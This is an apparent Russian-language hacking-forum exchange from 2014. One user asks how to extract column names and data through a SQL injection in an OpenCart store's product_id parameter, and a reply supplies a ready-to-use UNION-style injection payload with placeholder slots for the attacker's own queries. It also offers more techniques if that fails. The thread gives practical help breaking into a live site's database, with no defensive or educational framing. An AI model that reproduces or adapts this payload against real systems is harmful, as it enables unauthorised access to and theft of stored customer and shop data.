08.07.2014, 08:03
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
С нами:
8417113
Репутация:
0
|
|
Сообщение от EksTasy
имеется сайт на opencart и доступ к такому запросу, но все не так просто как хотелось бы, у нас только изменяемая переменная product_id с нашим значением.
Самое простое что получилось сделать, это выудить название таблиц из information_schema.
Хотелось бы добраться до названий столбцов таблиц и самих значений.
Здесь все как нельзя лучше - инъекция в select_expr. Вы не указали, какие столбцы идут на выход. Если первые идут, то эксплуатация такова:
Сообщение от None
SELECT s.stock_id, sd.name, sd.address, sd.surname, s.seek, (SELECT IFNULL(SUM(qty),0) FROM oc_stock_product_quantity WHERE stock_id = s.stock_id AND product_id = '
-666')-555*-1 as qty FROM (SELECT (1) stock_id, (2) seek)s JOIN (SELECT (3) name, (4) address, (5) surname)sd --
') as qty FROM oc_stock s LEFT JOIN oc_stock_description sd ON (s.stock_id = sd.stock_id) WHERE sd.language_id = '1' AND s.hidden = 0 AND s.sp != 1 AND s.stock_id IN (SELECT st2s.stock_id FROM oc_stock_to_organization AS st2s LEFT JOIN oc_organization_to_store o2s ON (st2s.organization_id = o2s.organization_id) WHERE o2s.store_id = 0) ORDER BY s.sort_order
Должно сработать (при выводе 1, 2, 3, 4, 5 на их место подставляйте свои запросы). Если на выход идет только 6-ой столбец (555) или имеет место что-то ещё - напишите об этом, приведу соответствующую технику.
|
|
|